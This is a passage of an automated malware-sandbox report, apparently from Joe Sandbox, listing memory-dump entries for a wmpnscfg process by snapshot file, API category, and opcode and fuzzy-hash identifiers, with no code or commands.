                                                                                                                • Source File: 00000020.00000002.3498125340.00007DF4DF3B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3B1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3b1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                • Instruction ID: bc1eb57bf4963e0ec31bba4377d83eceb51e3bcc5499bc02edaa261204aede15
                                                                                                                • Opcode Fuzzy Hash: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                • Instruction Fuzzy Hash: 32E04F305109095BEBA8EA1DC85979036E0EB58316F64426AD405CA291DB39949BCF81
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3499476686.00007DF4DF401000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF401000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df401000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                • Instruction ID: 1a62fa0a825d54f707ec95410275356f04fcea8e3010d59f3cecf21d45bf53ba
                                                                                                                • Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                • Instruction Fuzzy Hash: 43E0DF30A109465BEBA8D61DC80875036E0FB9C306F64826ED505C9285CB3D88DBCF81
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                • Instruction ID: de082f848c833963a4b617c218338ed9443d861d9f2b34f412eb9b8f92d8e877
                                                                                                                • Opcode Fuzzy Hash: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                • Instruction Fuzzy Hash: F291833021CA298FEB55FF18E48ABEA73E4FB55300F4545A9F94AC7196DE30E845CB81
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                • Instruction ID: 685e6878092cae7a961a7076e56ab5a5e2d4b5e9173c02a0f33c0de651b3769d
                                                                                                                • Opcode Fuzzy Hash: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                • Instruction Fuzzy Hash: FDE04F301009154BEFB8EB1DC84D36036E0E799306F604298D905C9295DB39C8ABCF86
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000003.3385880626.00007DF4DF3A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3A1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_3_7df4df3a1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                • Instruction ID: f5133d858ca272df6e610d87b661bee4ed1820f33112b6594305fca12a46443f
                                                                                                                • Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                • Instruction Fuzzy Hash: AAE0DF309009045BEBA8E61DC80D7503AE0EB4830AF64426AD104C9294CB3AC49BCF81
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498844093.00007DF4DF3E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3E1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3e1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                • Instruction ID: 191ea6def97738528ee74d3a8d49e4bb9b989a780f112c1757606f33c7e92d33
                                                                                                                • Opcode Fuzzy Hash: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                • Instruction Fuzzy Hash: F0E04F305009055BEBA8E71DC8497503AE0FF58316F64426AD405CA291DB3D94ABCF81
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                • Instruction ID: 674e8f3e5b22ccfd2e888ad2e9eb87288bcad3e7ad1bfa1057b7ce87f71b6bd2
                                                                                                                • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                • Instruction Fuzzy Hash: 3CD0A720320D2D0BEB5C733D2C9A73511CEE7CC221F51017AB90AC2281D964CC554300
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                • Instruction ID: 00b583f3fe874481003fd135e7620a6b29c184b00130d4ba34b137bada621f1c
                                                                                                                • Opcode Fuzzy Hash: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                • Instruction Fuzzy Hash: 12415E31218D1E8FDB94FF2DD889BB5B7E4FB68311B11466A9809C3664DB30E885CBC0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: eec3f8602b782a310c407d5c0930936ea6b1e134b4aff90934b64d7b708088a2
                                                                                                                • Instruction ID: 7950378b364c020964bd8f118952b0312afdc8728ef6a9179790d6db01511f32
                                                                                                                • Opcode Fuzzy Hash: eec3f8602b782a310c407d5c0930936ea6b1e134b4aff90934b64d7b708088a2
                                                                                                                • Instruction Fuzzy Hash: D021C331214D1C8FDB59FF1DD88D7B177E5EB6931170542A7D809CB255DA34D8848B80
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498125340.00007DF4DF3B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3B1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3b1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                • Instruction ID: 49f2ef8ec0f6bbb78d288c398eaf7c72608e00973a971d98b3fc2d4244585629
                                                                                                                • Opcode Fuzzy Hash: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                • Instruction Fuzzy Hash: 19115E716049958FEFB5AF69889476632F0EF94321F09027BE84ECE199EB349C60C791
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                • Instruction ID: 7c7f37b36c85ef7a793a65bd463fcccf2d8df2aeb92b99229eded97cfa4de2e5
                                                                                                                • Opcode Fuzzy Hash: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                • Instruction Fuzzy Hash: E211AD302009398FFF75AF2AA49936432E4EF59315F1501BAEE09CA185CB708C42C791
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                • Instruction ID: 578ca91d7d1105d13289d25e051297b2b74f05c25b3d6d8aaf524111dedc7d00
                                                                                                                • Opcode Fuzzy Hash: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                • Instruction Fuzzy Hash: D5F06D70210E2A4FEB94FF1AD09973477E4FB58305F610469850AC2590D7708C98C741